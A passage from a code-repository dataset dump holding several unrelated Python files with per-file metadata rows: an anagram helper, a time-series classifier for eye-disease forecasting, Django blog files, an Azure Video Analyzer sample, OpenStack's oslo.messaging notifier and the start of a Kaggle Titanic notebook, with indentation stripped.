"""Read name & dictionary file & display all anagrams IN name."""
name_letter_map = Counter(name)
anagrams = []
for word in word_list:
test = ''
word_letter_map = Counter(word.lower())
for letter in word:
if word_letter_map[letter] <= name_letter_map[letter]:
test += letter
if Counter(test) == word_letter_map:
anagrams.append(word)
print(*anagrams, sep='\n')
print()
print(f"Remaining letters = {name}")
print(f"Number of remaining letters = {len(name)}")
print(f"Number of remaining (real word) anagrams = {len(anagrams)}")
def process_choice(name):
"""Check user choice for validity, return choice & leftover letters."""
while True:
choice = input('\n Make a choice else Enter to start over or # to end: ')
if choice == '':
main()
elif choice == '#':
sys.exit()
else:
candidate = "".join(choice.lower().split())
left_over_list = list(name)
for letter in candidate:
if letter in left_over_list:
left_over_list.remove(letter)
if len(name) - len(left_over_list) == len(candidate):
break
else:
print("Won't work! Make another choice!", file=sys.stderr)
name = ''.join(left_over_list) # makes display more readable
return choice, name
def main():
"""Help user build anagram phrase from their name."""
name = "".join(ini_name.lower().split())
name = name.replace('-','')
limit = len(name)
phrase = ''
running = True
while running:
temp_phrase = phrase.replace(' ','')
if len(temp_phrase) < limit:
print(f"Length of anagram phrase = {len(temp_phrase)}")
find_anagrams(name, dict_file)
print(f"Current anagram phrase = {phrase}")
choice, name = process_choice(name)
phrase += choice + ' '
elif len(temp_phrase) == limit:
print("\n*******FINISHED!!!****\n")
print("Anagram of name =", end=" ")
print(phrase, file=sys.stderr)
print()
try_again = input('\n\nTry again? (Press Enter else "n" to quit)\n ')
if try_again.lower() == "n":
running = False
sys.exit()
else:
main()
if __name__== '__main__':
main()
| [
"[email protected]"
] | |
67a8cf830caa53586b330191c8b6886df0bca681 | b7865b9f01e6f373f1bf1d49f40d6bbba11e655c | /classification.py | 40483720be8b9f79f8eca0a67fb2056d7f48b6f1 | [] | no_license | andreeabea/AMDForecastingSystem | d6beeaa2d83af4f5d0581ab95e91e1ad403621f1 | 48138bfc9389835503fae8b4c066b2665ad6605b | refs/heads/master | 2023-06-10T19:42:21.775291 | 2021-07-06T18:14:07 | 2021-07-06T18:14:07 | 328,631,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,102 | py | import numpy as np
import pandas as pd
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.model_selection import KFold, cross_val_score, cross_val_predict
from tslearn.neighbors import KNeighborsTimeSeriesClassifier
from tslearn.svm import TimeSeriesSVC
from tslearn.utils import to_time_series_dataset
from data_processing.db_handler import DbHandler
from data_processing.timeseries_augmentation import TimeSeriesGenerator
from neural_networks.cnn import Cnn
from regression import TimeSeriesRegressor
from sklearn.metrics import confusion_matrix
import seaborn as sns
import matplotlib.pyplot as plt
class TimeSeriesClassifier:
def __init__(self, data):
self.data = data
self.gen = TimeSeriesGenerator(data)
def split_data(self):
labels = np.array(self.get_actual_labels())
mask = np.random.rand(len(labels)) < 0.8
trainY = labels[mask]
testY = labels[~mask]
i = 0
trainX = []
testX = []
for nb, group in self.data.groupby('ID'):
if mask[i] == 1:
trainX.append(group)
else:
testX.append(group)
i += 1
trainX = pd.concat(trainX)
testX = pd.concat(testX)
trainX = trainX.groupby('ID').apply(pd.DataFrame.to_numpy).to_numpy().tolist()
trainX = to_time_series_dataset(trainX)
testX = testX.groupby('ID').apply(pd.DataFrame.to_numpy).to_numpy().tolist()
testX = to_time_series_dataset(testX)
return trainX, trainY, testX, testY
def get_actual_labels(self):
actual_labels = []
for nb, group in self.data.groupby('ID'):
actual_label = 0
if group['VA'].iloc[0] > group['VA'].iloc[group.shape[0] - 1]:
actual_label = 1
actual_labels.append(actual_label)
return actual_labels
def knn_classifier(self, nb_neighbors):
knn = KNeighborsTimeSeriesClassifier(n_neighbors=nb_neighbors, metric="dtw")
trainX, trainY, testX, testY = self.split_data()
knn = knn.fit(trainX, trainY)
print(knn.score(testX, testY))
conf_matrix = confusion_matrix(testY, knn.predict(testX))
sns.heatmap(conf_matrix, annot=True)
plt.show()
def svc_classifier(self):
print("Support vector classifier ...")
svc = TimeSeriesSVC(kernel="gak", gamma="auto", probability=True)
trainX, trainY, testX, testY = self.split_data()
print(svc.fit(trainX, trainY).score(testX, testY))
def gradient_boosted_classifier(self, include_timestamp=False, previous_visits=1, features='exclude VA'):
print("Gradient boosting classifier ...")
X, Y = self.gen.generate_timeseries(include_timestamp, previous_visits, features)
XwithVA, _ = self.gen.generate_timeseries(include_timestamp, previous_visits, 'all')
gbr = GradientBoostingClassifier()
# get VA distinct labels
# va_set = list(set(list(Y)))
# for i in range(len(Y)):
# for j in range(len(va_set)):
# if Y[i] == va_set[j]:
# Y[i] = j
# get VA distinct labels: good/bad evolution
for i in range(len(Y)):
if Y[i] > XwithVA[i][0]:
Y[i] = -1
else:
Y[i] = 1
cv = KFold(n_splits=10)
n_scores = cross_val_score(gbr, X, Y, cv=cv, n_jobs=-1)
print('Accuracy: ' + str(np.mean(n_scores)))
pred = cross_val_predict(gbr, X, Y, cv=cv, n_jobs=-1)
conf_matrix = confusion_matrix(Y, pred, labels=[-1, 1])
sns.heatmap(conf_matrix, annot=True, yticklabels=['Actual good evolution', 'Actual bad evolution'])
plt.show()
def cnn_classifier(self, include_timestamp=False, previous_visits=1, features='exclude VA'):
X, Y = self.gen.generate_timeseries(include_timestamp, previous_visits, features)
XwithVA, _ = self.gen.generate_timeseries(include_timestamp, previous_visits, 'all')
# get VA distinct labels: good/bad evolution
newY = np.array([])
for i in range(len(Y)):
if Y[i] > XwithVA[i][0]:
newY = np.append(newY, np.array([1, 0]))
else:
newY = np.append(newY, np.array([0, 1]))
newY = newY.reshape(-1, 2)
trainX, trainY, validX, validY, testX, testY = TimeSeriesRegressor.train_test_val_split(X, newY)
cnn = Cnn(trainX, trainY, validX, validY, testX, testY, nb_labels=2)
cnn.train()
cnn.evaluate_model()
if __name__ == '__main__':
#DatasetBuilder.write_all_data_to_csv("image_data.csv", datatype='images', include_timestamps=True)
include_timestamps = True
datatype = 'all'
db_handler = DbHandler(datatype, include_timestamps)
data = db_handler.get_data_from_csv()
ts_classifier = TimeSeriesClassifier(data)
ts_classifier.gradient_boosted_classifier(include_timestamps, 1, 'exclude VA')
ts_classifier.knn_classifier(2)
#ts_classifier.cnn_classifier(include_timestamps, 3, 'all')
| [
"[email protected]"
] | |
6f300349b1f81d04440306a3d5f6a00f49504e6f | f25b416baae4865aba91e6764ebfa3b3d893218e | /blog/migrations/0001_initial.py | a1fee9040dd9536bbf07861bdefbaf176cb695de | [] | no_license | Avemik/my-first-blog | 5901b7800298d6c1867dca1f1d6e2036de4fe6bb | 21260c3554b8d8891b43f2a40221608b8783ed46 | refs/heads/master | 2020-07-21T20:59:58.371875 | 2019-09-12T15:23:32 | 2019-09-12T15:23:32 | 206,974,381 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 986 | py | # Generated by Django 2.2.5 on 2019-09-07 13:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
a841d28195099567f9a6575466096684a0c9dcf7 | 133f458094272d1ff88ff52aedeaa5a600a180b7 | /products/views.py | f6d7bdb7bd6c887ee8a5fc427afb7fae84afba7c | [] | no_license | ndirpaya/pyshop | b0a3a442079ca0750e72c80d032b11203dd26c3b | abaa6636c2e573965707eb2def00fd90ef810aab | refs/heads/master | 2022-03-29T23:21:31.364678 | 2020-01-29T21:11:29 | 2020-01-29T21:11:29 | 236,195,037 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 304 | py | from django.http import HttpResponse
from django.shortcuts import render
from .models import Product
def index(request):
products = Product.objects.all()
return render(request, 'index.html',
{'products': products})
def new(request):
return HttpResponse('New Products')
| [
"[email protected]"
] | |
c07a195b56a6430ae1cd12cc7690551ff48e05c1 | e57d7785276053332c633b57f6925c90ad660580 | /sdk/videoanalyzer/azure-media-videoanalyzer-edge/samples/sample_lva.py | 2ab1f294951a6235a5ce114d5aa78abe8004273d | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | adriananeci/azure-sdk-for-python | 0d560308497616a563b6afecbb494a88535da4c5 | b2bdfe659210998d6d479e73b133b6c51eb2c009 | refs/heads/main | 2023-08-18T11:12:21.271042 | 2021-09-10T18:48:44 | 2021-09-10T18:48:44 | 405,684,423 | 1 | 0 | MIT | 2021-09-12T15:51:51 | 2021-09-12T15:51:50 | null | UTF-8 | Python | false | false | 4,234 | py |
import json
import os
from azure.media.videoanalyzeredge import *
from azure.iot.hub import IoTHubRegistryManager #run pip install azure-iot-hub to get this package
from azure.iot.hub.models import CloudToDeviceMethod, CloudToDeviceMethodResult
from datetime import time
device_id = "lva-sample-device"
module_d = "mediaEdge"
connection_string = "connectionString"
live_pipeline_name = "pipelineInstance1"
pipeline_topology_name = "pipelineTopology1"
url = "rtsp://sample-url-from-camera"
def build_pipeline_topology():
pipeline_topology_properties = PipelineTopologyProperties()
pipeline_topology_properties.description = "Continuous video recording to an Azure Media Services Asset"
user_name_param = ParameterDeclaration(name="rtspUserName",type="String",default="testusername")
password_param = ParameterDeclaration(name="rtspPassword",type="SecretString",default="testpassword")
url_param = ParameterDeclaration(name="rtspUrl",type="String",default="rtsp://www.sample.com")
hub_param = ParameterDeclaration(name="hubSinkOutputName",type="String")
source = RtspSource(name="rtspSource", endpoint=UnsecuredEndpoint(url="${rtspUrl}",credentials=UsernamePasswordCredentials(username="${rtspUserName}",password="${rtspPassword}")))
node = NodeInput(node_name="rtspSource")
sink = IotHubMessageSink("msgSink", node, "${hubSinkOutputName}")
pipeline_topology_properties.parameters = [user_name_param, password_param, url_param, hub_param]
pipeline_topology_properties.sources = [source]
pipeline_topology_properties.sinks = [sink]
pipeline_topology = PipelineTopology(name=pipeline_topology_name,properties=pipeline_topology_properties)
return pipeline_topology
def build_live_pipeline():
url_param = ParameterDefinition(name="rtspUrl", value=url)
pass_param = ParameterDefinition(name="rtspPassword", value="secret_password")
live_pipeline_properties = LivePipelineProperties(description="Sample description", topology_name=pipeline_topology_name, parameters=[url_param])
live_pipeline = LivePipeline(name=live_pipeline_name, properties=live_pipeline_properties)
return live_pipeline
def invoke_method_helper(method):
direct_method = CloudToDeviceMethod(method_name=method.method_name, payload=method.serialize())
registry_manager = IoTHubRegistryManager(connection_string)
payload = registry_manager.invoke_device_module_method(device_id, module_d, direct_method).payload
if payload is not None and 'error' in payload:
print(payload['error'])
return None
return payload
def main():
pipeline_topology = build_pipeline_topology()
live_pipeline = build_live_pipeline()
try:
set_pipeline_top_response = invoke_method_helper(PipelineTopologySetRequest(pipeline_topology=pipeline_topology))
print(set_pipeline_top_response)
list_pipeline_top_response = invoke_method_helper(PipelineTopologyListRequest())
if list_pipeline_top_response:
list_pipeline_top_result = PipelineTopologyCollection.deserialize(list_pipeline_top_response)
get_pipeline_top_response = invoke_method_helper(PipelineTopologyGetRequest(name=pipeline_topology_name))
if get_pipeline_top_response:
get_pipeline_top_result = PipelineTopology.deserialize(get_pipeline_top_response)
set_live_pipeline_response = invoke_method_helper(LivePipelineSetRequest(live_pipeline=live_pipeline))
activate_pipeline_response = invoke_method_helper(LivePipelineActivateRequest(name=live_pipeline_name))
get_pipeline_response = invoke_method_helper(LivePipelineGetRequest(name=live_pipeline_name))
if get_pipeline_response:
get_pipeline_result = LivePipeline.deserialize(get_pipeline_response)
deactivate_pipeline_response = invoke_method_helper(LivePipelineDeactivateRequest(name=live_pipeline_name))
delete_pipeline_response = invoke_method_helper(LivePipelineDeleteRequest(name=live_pipeline_name))
delete_pipeline_response = invoke_method_helper(PipelineTopologyDeleteRequest(name=pipeline_topology_name))
except Exception as ex:
print(ex)
if __name__ == "__main__":
main() | [
"[email protected]"
] | |
8f253823d68500299a603d2766f6c38e76567c4a | 6b97da799cb9b72d711a5e1d6321e4e11f3cbe51 | /lib/python2.7/site-packages/oslo_messaging/notify/notifier.py | 2d58a9adf314f7cf2d6dd2a9def9c8524c365517 | [] | no_license | dx-entity/env_parabola | 3531120d213ade533052161ec70f3a511f2fc90a | f830d5f05a578b1ed2b16f6898fb226e27de6b52 | refs/heads/master | 2021-01-09T20:22:51.509076 | 2016-07-22T06:55:49 | 2016-07-22T06:55:49 | 63,930,774 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,822 | py |
# Copyright 2011 OpenStack Foundation.
# All Rights Reserved.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
import uuid
from debtcollector import renames
from oslo_config import cfg
from oslo_utils import timeutils
import six
from stevedore import named
from oslo_messaging._i18n import _LE
from oslo_messaging import serializer as msg_serializer
from oslo_messaging import transport as msg_transport
_notifier_opts = [
cfg.MultiStrOpt('driver',
default=[],
deprecated_name='notification_driver',
deprecated_group='DEFAULT',
help='The Drivers(s) to handle sending notifications. '
'Possible values are messaging, messagingv2, '
'routing, log, test, noop'),
cfg.StrOpt('transport_url',
deprecated_name='notification_transport_url',
deprecated_group='DEFAULT',
secret=True,
help='A URL representing the messaging driver to use for '
'notifications. If not set, we fall back to the same '
'configuration used for RPC.'),
cfg.ListOpt('topics',
default=['notifications', ],
deprecated_opts=[
cfg.DeprecatedOpt('topics',
group='rpc_notifier2'),
cfg.DeprecatedOpt('notification_topics',
group='DEFAULT')
],
help='AMQP topic used for OpenStack notifications.'),
]
_LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Driver(object):
"""Base driver for Notifications"""
def __init__(self, conf, topics, transport):
"""base driver initialization
:param conf: configuration options
:param topics: list of topics
:param transport: transport driver to use
"""
self.conf = conf
self.topics = topics
self.transport = transport
@abc.abstractmethod
def notify(self, ctxt, msg, priority, retry):
"""send a single notification with a specific priority
:param ctxt: current request context
:param msg: message to be sent
:type msg: str
:param priority: priority of the message
:type priority: str
:param retry: an connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
"""
pass
def get_notification_transport(conf, url=None,
allowed_remote_exmods=None, aliases=None):
conf.register_opts(_notifier_opts,
group='oslo_messaging_notifications')
if url is None:
url = conf.oslo_messaging_notifications.transport_url
return msg_transport.get_transport(conf, url,
allowed_remote_exmods, aliases)
class Notifier(object):
"""Send notification messages.
The Notifier class is used for sending notification messages over a
messaging transport or other means.
Notification messages follow the following format::
{'message_id': six.text_type(uuid.uuid4()),
'publisher_id': 'compute.host1',
'timestamp': timeutils.utcnow(),
'priority': 'WARN',
'event_type': 'compute.create_instance',
'payload': {'instance_id': 12, ... }}
A Notifier object can be instantiated with a transport object and a
publisher ID:
notifier = messaging.Notifier(get_notification_transport(CONF),
'compute')
and notifications are sent via drivers chosen with the driver
config option and on the topics chosen with the topics config
option in [oslo_messaging_notifications] section.
Alternatively, a Notifier object can be instantiated with a specific
driver or topic::
transport = notifier.get_notification_transport(CONF)
notifier = notifier.Notifier(transport,
'compute.host',
driver='messaging',
topic='notifications')
Notifier objects are relatively expensive to instantiate (mostly the cost
of loading notification drivers), so it is possible to specialize a given
Notifier object with a different publisher id using the prepare() method::
notifier = notifier.prepare(publisher_id='compute')
notifier.info(ctxt, event_type, payload)
"""
@renames.renamed_kwarg('topic', 'topics',
message="Please use topics instead of topic",
version='4.5.0',
removal_version='5.0.0')
def __init__(self, transport, publisher_id=None,
driver=None, topic=None,
serializer=None, retry=None,
topics=None):
"""Construct a Notifier object.
:param transport: the transport to use for sending messages
:type transport: oslo_messaging.Transport
:param publisher_id: field in notifications sent, for example
'compute.host1'
:type publisher_id: str
:param driver: a driver to lookup from oslo_messaging.notify.drivers
:type driver: str
:param topic: the topic which to send messages on
:type topic: str
:param serializer: an optional entity serializer
:type serializer: Serializer
:param retry: an connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
:param topics: the topics which to send messages on
:type topics: list of strings
"""
conf = transport.conf
conf.register_opts(_notifier_opts,
group='oslo_messaging_notifications')
self.transport = transport
self.publisher_id = publisher_id
self.retry = retry
self._driver_names = ([driver] if driver is not None else
conf.oslo_messaging_notifications.driver)
if topics is not None:
self._topics = topics
elif topic is not None:
self._topics = [topic]
else:
self._topics = conf.oslo_messaging_notifications.topics
self._serializer = serializer or msg_serializer.NoOpSerializer()
self._driver_mgr = named.NamedExtensionManager(
'oslo.messaging.notify.drivers',
names=self._driver_names,
invoke_on_load=True,
invoke_args=[conf],
invoke_kwds={
'topics': self._topics,
'transport': self.transport,
}
)
_marker = object()
def prepare(self, publisher_id=_marker, retry=_marker):
"""Return a specialized Notifier instance.
Returns a new Notifier instance with the supplied publisher_id. Allows
sending notifications from multiple publisher_ids without the overhead
of notification driver loading.
:param publisher_id: field in notifications sent, for example
'compute.host1'
:type publisher_id: str
:param retry: an connection retries configuration
None or -1 means to retry forever
0 means no retry
N means N retries
:type retry: int
"""
return _SubNotifier._prepare(self, publisher_id, retry=retry)
def _notify(self, ctxt, event_type, payload, priority, publisher_id=None,
retry=None):
payload = self._serializer.serialize_entity(ctxt, payload)
ctxt = self._serializer.serialize_context(ctxt)
msg = dict(message_id=six.text_type(uuid.uuid4()),
publisher_id=publisher_id or self.publisher_id,
event_type=event_type,
priority=priority,
payload=payload,
timestamp=six.text_type(timeutils.utcnow()))
def do_notify(ext):
try:
ext.obj.notify(ctxt, msg, priority, retry or self.retry)
except Exception as e:
_LOG.exception(_LE("Problem '%(e)s' attempting to send to "
"notification system. Payload=%(payload)s"),
dict(e=e, payload=payload))
if self._driver_mgr.extensions:
self._driver_mgr.map(do_notify)
def audit(self, ctxt, event_type, payload):
"""Send a notification at audit level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'AUDIT')
def debug(self, ctxt, event_type, payload):
"""Send a notification at debug level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'DEBUG')
def info(self, ctxt, event_type, payload):
"""Send a notification at info level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'INFO')
def warn(self, ctxt, event_type, payload):
"""Send a notification at warning level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'WARN')
warning = warn
def error(self, ctxt, event_type, payload):
"""Send a notification at error level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'ERROR')
def critical(self, ctxt, event_type, payload):
"""Send a notification at critical level.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'CRITICAL')
def sample(self, ctxt, event_type, payload):
"""Send a notification at sample level.
Sample notifications are for high-frequency events
that typically contain small payloads. eg: "CPU = 70%"
Not all drivers support the sample level
(log, for example) so these could be dropped.
:param ctxt: a request context dict
:type ctxt: dict
:param event_type: describes the event, for example
'compute.create_instance'
:type event_type: str
:param payload: the notification payload
:type payload: dict
:raises: MessageDeliveryFailure
"""
self._notify(ctxt, event_type, payload, 'SAMPLE')
class _SubNotifier(Notifier):
_marker = Notifier._marker
def __init__(self, base, publisher_id, retry):
self._base = base
self.transport = base.transport
self.publisher_id = publisher_id
self.retry = retry
self._serializer = self._base._serializer
self._driver_mgr = self._base._driver_mgr
def _notify(self, ctxt, event_type, payload, priority):
super(_SubNotifier, self)._notify(ctxt, event_type, payload, priority)
@classmethod
def _prepare(cls, base, publisher_id=_marker, retry=_marker):
if publisher_id is cls._marker:
publisher_id = base.publisher_id
if retry is cls._marker:
retry = base.retry
return cls(base, publisher_id, retry=retry)
| [
"[email protected]"
] | |
1eeb2cafad0029b077786f0561a90d2e74ca20f8 | a560269290749e10466b1a29584f06a2b8385a47 | /Notebooks/py/marcmolina/titanic-a-pragmatic-approach/titanic-a-pragmatic-approach.py | e735644bf36485ff4e1e74d831e507fa1c5f1817 | [] | no_license | nischalshrestha/automatic_wat_discovery | c71befad1aa358ae876d5494a67b0f4aa1266f23 | 982e700d8e4698a501afffd6c3a2f35346c34f95 | refs/heads/master | 2022-04-07T12:40:24.376871 | 2020-03-15T22:27:39 | 2020-03-15T22:27:39 | 208,379,586 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 71,349 | py | #!/usr/bin/env python
# coding: utf-8
# # Titanic: A Pragmatic Approach
# > Not intended to be read by the absolute beginner.
#
# Overview of the problem: https://www.kaggle.com/c/titanic
#
# 
#
# ### Acknowledgments
# This notebook has been heavily influenced by those *great* contributions:
# * [A Data Science Framework: To Achieve 99% Accuracy](https://www.kaggle.com/ldfreeman3/a-data-science-framework-to-achieve-99-accuracy/code) by LD Freeman
# * [Titanic Top 4% with ensemble modeling](https://www.kaggle.com/yassineghouzam/titanic-top-4-with-ensemble-modeling) by Yassine Ghouzam
# * [Titanic: 2nd degree families and majority voting](https://www.kaggle.com/erikbruin/titanic-2nd-degree-families-and-majority-voting) by Erik Bruin
# * [Pytanic](https://www.kaggle.com/headsortails/pytanic/code) by Heads or Tails
# * [Divide and Conquer [0.82296]](https://www.kaggle.com/pliptor/divide-and-conquer-0-82296) by Oscar Takeshita
# * [Titanic [0.82] - [0.83]](https://www.kaggle.com/konstantinmasich/titanic-0-82-0-83) by Konstantin
# ## Our data science workflow
# * [**Step 1:** Defining the problem (description and objective)](#step1)
# * [**Step 2:** Gathering the data (automatic downloading)](#step2)
# * [**Step 3:** Performing exploratory data analysis (visualizing data, getting intuition)](#step3)
# * [**Step 4:** Preparing the data for consumption (data cleaning, feature engineering)](#step4)
# * [**Step 5:** Modeling the data (machine learning algorithms, optimizations)](#step5)
# * [**Step 6:** Drawing conclusions](#step6)
# ## Step 1: Defining the problem <a id="step1"></a>
#
# ### Kaggle description (as is)
# The sinking of the RMS Titanic is one of the most infamous shipwrecks in history. On April 15, 1912, during her maiden voyage, the Titanic sank after colliding with an iceberg, killing 1502 out of 2224 passengers and crew. This sensational tragedy shocked the international community and led to better safety regulations for ships.
#
# One of the reasons that the shipwreck led to such loss of life was that there were not enough lifeboats for the passengers and crew. Although there was some element of luck involved in surviving the sinking, some groups of people were more likely to survive than others, such as women, children, and the upper-class.
#
# In this challenge, we ask you to complete the analysis of what sorts of people were likely to survive. In particular, we ask you to apply the tools of machine learning to predict which passengers survived the tragedy.
#
# ### Objective
# Predict who survived and who did not during the Titanic disaster, based on the features collected for us in the dataset: **BINARY CLASSIFICATION PROBLEM**.
#
# #### Dataset
#
# We denote our *dataset* by $(X,Y) \in \chi^m \times \{0,1\}^m$ where :
# * $\chi$ is an abstract space of feature vectors
# * $X = (x_1, ..., x_m)$ is our vector of $m$ *feature vectors* where $x_i = (x_1^{(i)},...,x_n^{(i)})$
# * $Y = (y_1, ..., y_m)$ is our vector of labels
#
# #### Goal
#
# We wish to find a good *classifier* $h$ mapping a vector in the abstract feature space to a binary output:
# $$\begin{align*}
# h \colon \chi &\to \{0,1\}\\
# x &\mapsto y
# \end{align*}$$
#
# *"good"* means we want to have a low *classification error (risk)* $\mathcal{R}(h) = \mathrm{P}(h(x) \neq y)$.
#
# #### Hidden goal
#
# $y$ is distributed according to a *Bernoulli distribution* ($y \in \{0,1\}$), so we write $y|x \sim \mathrm{Bernoulli}(\eta(x))$, where $\eta(x) = \mathrm{P}(y=1|x) = \mathrm{E}(y|x)$.
#
# The problem is we don't have access to the distribution of $y|x$ which makes it hard to find the perfect classifier $\eta$. Our goal is then not only to find a good classifier, but eventually to transform $x$ such that $y|x$ has a more predictable distribution for a potentially good classifier. In other words, we want our model to be able to have good generalization capabilities, as such we will apply a combination of multiple transformations on our dataset $X$.
#
# $X$ will then be mapped to a dataset $\widetilde{X}$ in a different feature space $\widetilde{\chi} \simeq [0,1]^n$.
#
# For a more in-depth look at binary classification, feel free to read those notes: https://ocw.mit.edu/courses/mathematics/18-657-mathematics-of-machine-learning-fall-2015/lecture-notes/MIT18_657F15_L2.pdf.
# ## Step 2: Gathering the data <a id="step2"></a>
# The data is available online as 3 CSV files at [https://www.kaggle.com/c/titanic/data](https://www.kaggle.com/c/titanic/data).
#
# Let's download them automatically.
# In[ ]:
import os
from pathlib import Path
import subprocess
# Create the input directory if it doesn't exist
if not os.path.exists('../input'):
os.makedirs('../input')
file_on_disk = True
# Check if the files are on disk before download
for file in os.listdir('../input'):
if not Path('../input/' + file).is_file():
# The file is not on disk
file_on_disk = False
break
if not file_on_disk:
# Download the files with your API token in ~/.kaggle
error = subprocess.call('kaggle competitions download -c titanic -p ../input'.split())
if not error:
print('Files downloaded successfully.')
else:
print('An error occurred during donwload, check your API token.')
else:
print('Files are already on disk.')
# ## Step 3: Performing exploratory data analysis <a id="step3"></a>
#
# Kaggle is providing both **train** and **test** sets, we will perform EDA for each one of them.
#
# ### 3.1. Import libraries
#
# **Visualization** is `matplotlib`/`seaborn` based, **data preprocessing** is essentially `pandas` based, and **modelling** is mostly `scikit-learn` based.
# In[ ]:
# Load packages
print('Python packages:')
print('-'*15)
import sys
print('Python version: {}'. format(sys.version))
import pandas as pd
print('pandas version: {}'. format(pd.__version__))
import matplotlib
print('matplotlib version: {}'. format(matplotlib.__version__))
import numpy as np
print('NumPy version: {}'. format(np.__version__))
import scipy as sp
print('SciPy version: {}'. format(sp.__version__))
import IPython
from IPython import display
print('IPython version: {}'. format(IPython.__version__))
import sklearn
print('scikit-learn version: {}'. format(sklearn.__version__))
# Miscsellaneous libraries
import random
import time
# Ignore warnings
import warnings
warnings.filterwarnings('ignore')
print('')
# Check the input directory
print('Input directory: ')
print('-'*15)
from subprocess import check_output
print(check_output(['ls', '../input']).decode('utf8'))
# ### 3.2. Load the data modelling libraries
# In[ ]:
# Common model algorithms
from sklearn import neighbors, ensemble
from xgboost import XGBClassifier
import lightgbm as lgb
from catboost import CatBoostClassifier
# Common model helpers
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import LabelEncoder, StandardScaler
from sklearn import model_selection
# Visualization
import matplotlib as mpl
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
from matplotlib.ticker import PercentFormatter
import seaborn as sns
# Configure visualization defaults
get_ipython().magic(u'matplotlib inline')
mpl.style.use('ggplot')
sns.set_style('white')
palette = sns.color_palette('Set2', 10)
pylab.rcParams['figure.figsize'] = 18,4
# ### 3.3 Meet the data
#
# The dataset is briefly described here: [https://www.kaggle.com/c/titanic/data](https://www.kaggle.com/c/titanic/data)
#
# It is composed of **11 independent variables** and **1 dependent variable**.
#
# **Variable description**
#
# |Variable|Definition|Key|Type|
# |--------|----------|---|----|
# |**Survived**|Survival|0 = No, 1 = Yes|**CATEGORICAL**|
# |**Pclass**|Ticket class|1 = 1st, 2 = 2nd, 3 = 3rd|**ORDINAL**|
# |**Name**|Passenger's name|N/A|**MIXED**|
# |**Sex**|Passenger's sex|N/A|**CATEGORICAL**|
# |**Age**|Passenger's age|N/A|**CONTINUOUS**|
# |**SibSp**|# of siblings / spouses aboard the Titanic|N/A|**DISCRETE**|
# |**Parch**|# of parents / children aboard the Titanic|N/A|**DISCRETE**|
# |**Ticket**|Ticket number|N/A|**MIXED**|
# |**Fare**|Passenger fare|N/A|**CONTINUOUS**|
# |**Cabin**|Cabin number|N/A|**MIXED**|
# |**Embarked**|Port of embarkation|C = Cherbourg, Q = Queenstown, S = Southampton|**CATEGORICAL**|
# In[ ]:
train_df = pd.read_csv('../input/train.csv').set_index(keys='PassengerId', drop=True)
test_df = pd.read_csv('../input/test.csv').set_index(keys='PassengerId', drop=True)
# Useful for more accurate feature engineering
data_df = train_df.append(test_df)
# #### Samples
# In[ ]:
train_df.sample(10)
# #### Simple statistics from the train set
# 891 samples.
# In[ ]:
train_df.describe(include = 'all')
# #### Simple statistics from the test set
# 418 samples.
# In[ ]:
test_df.describe(include = 'all')
# 891 samples to predict the outcome of 418 samples is a pretty bad ratio (2.14), there is a high risk of overfitting the train set.
# ### 3.4 Missing data
# Let's have a quick look at missing data on both sets.
# In[ ]:
def plot_missing_values(dataset):
"""
Plots the proportion of missing values per feature of a dataset.
:param dataset: pandas DataFrame
"""
missing_data_percent = [x / len(dataset) for x in dataset.isnull().sum()]
data_percent = [1 - x for x in missing_data_percent]
fig, axs = plt.subplots(1,1,figsize=(18,4))
plt.bar(dataset.columns.values, data_percent, color='#84B044', linewidth=0)
